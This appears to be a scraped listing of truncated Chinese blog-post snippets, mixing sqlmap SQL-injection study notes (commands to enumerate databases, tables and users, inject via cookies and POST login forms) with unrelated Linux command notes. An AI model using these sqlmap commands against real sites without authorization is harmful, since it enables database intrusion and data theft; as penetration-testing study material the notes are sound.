基础命令 注入 MySQL mssql access 直接爆表.然后你懂的BT5里面的话前面就要加pythonsqlmap.py -u url --dbs //爆数据库sqlmap.py -u url --current-db //爆当前库sqlmap.py -u url --current-user //爆当前用户sqlmap.py -u url --users 查看用户权限sqlmap.py -u url --tables -D 数据库 //爆表段sqlmap.py -u url --col…

SQLMAP学习笔记1  access注入 Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL.Oracle.PostgreSQL.Microsoft SQL Server.Microsoft Access.IBM DB2.SQLite.Firebird.Sybase.SAP MaxDB.HSQLDB和Informix等多种数据库管理系统. 完全支持布尔型盲注.时间型盲注.基于错误信息的注入.联合查询注入和堆查询注入. 在数据库证书.IP地址.端口和…

Linux 常用命令笔记 1. locate locate:用来定位文件的位置,如:locate a.txt 但是这个命令有延迟,也就是新建的文件不一定能搜索到,如果非要找到新建的文件可以使用 updatedb 命令来强制更新locate依赖的数据库. 2. 查询文本文件行数 wc -l filename 3.远程Linux服务器 ssh username@192.168.1.1 或 ssh username@hostnme 使用主机名需要在本地进行主机名与IP地址映射: 在/etc/hosts…

 Linux常用命令  笔记 一.文件处理命令 1. ls命令:显示目录文件                          -a 显示所有文件,包括隐藏文件.(all)                          -l 详细信息显示,长格式显示文件.(long)                          -d 查看目录属性.查看目录详细信息,不加-d则只显示目录下的数据而不显示目录本身                         -I 可查询任何一个目录下面任何一文件的i节…

命令笔记 (随笔原创,借鉴请修改) linux系统中一切都是文件 2.4  系统状态的命令:  ifconfig   :    查看系统网卡信息,包括网卡名称,ip地址,掩码,mac地址,收到数据包大小和发送数据包大小. uname  :     查看系统内核信息. 参数:-a    所有信息 -r     内核版本号 uptime :     是top的第一行,系统的时间,终端数和负载.  free :    查看系统中内存使用情况. 参数:  -h    以最直观显示  -m    以单位M…

SQLMAP学习笔记2 Mysql数据库注入 注入流程 (如果网站需要登录,就要用到cookie信息,通过F12开发者工具获取cookie信息) sqlmap -u "URL" --cookie="名称=值; 名称=值" --batch   #其中-u参数指定目标URL,--batch参数采用默认选项.不进行询问. 结果发现是可注入的 1.sqlmap -u "url" --dbs # 获取数据库: 2.sqlmap -u "url&q…

SQLMP参数分析 1 目录 1.Target Options 2.Requests Options 3.Injection Options 4.Detection Options 5.Techniques Options 6.Fingerprint options 7.Enumeration options 8.Brute force options 9.User-defined function options 10.File system options 11.Takeover optio…

4.Sqlmap系列教程——post登录框注入注入点: http://xxx.xxx.com/Login.asp 注入方式一: 1.对着注入点使用burp抓包,保存txt格式文件. 2.输入命令: ./sqlmap.py -r search-test.txt -p tfUPass 注入方式二:自动搜索表单的方式 sqlmap -u http://xxx.xxx.com/Login.asp --forms 注入方式三:指定一个参数的方法 &tfUPass="…

笔记1:查看ubuntu是32位还是64位的方法及其版本号 查看ubuntu是64还是32的命令如下: uname -m 如果是i386到i686,那就是32位系统:如果是x86_64 ,那就是64系统. 查看Ubuntu版本的方法有两种. 方法一:在终端中执行下列指令: cat /etc/issue 可以查看当前正在运行的 Ubuntu 的版本号.其输出结果类似下面的内容:Ubuntu 7.04 \n \l 方法二:使用 lsb_release命令也可以查看 Ubuntu 的版本号,与方法一相…

-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “” #指定数据库名-T “” #指定表名-C “” #指定字段-s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” –resume)--columns #列出字段--current-user #获取当前用户名称--current-db #获取当前数据库名称--users #列数…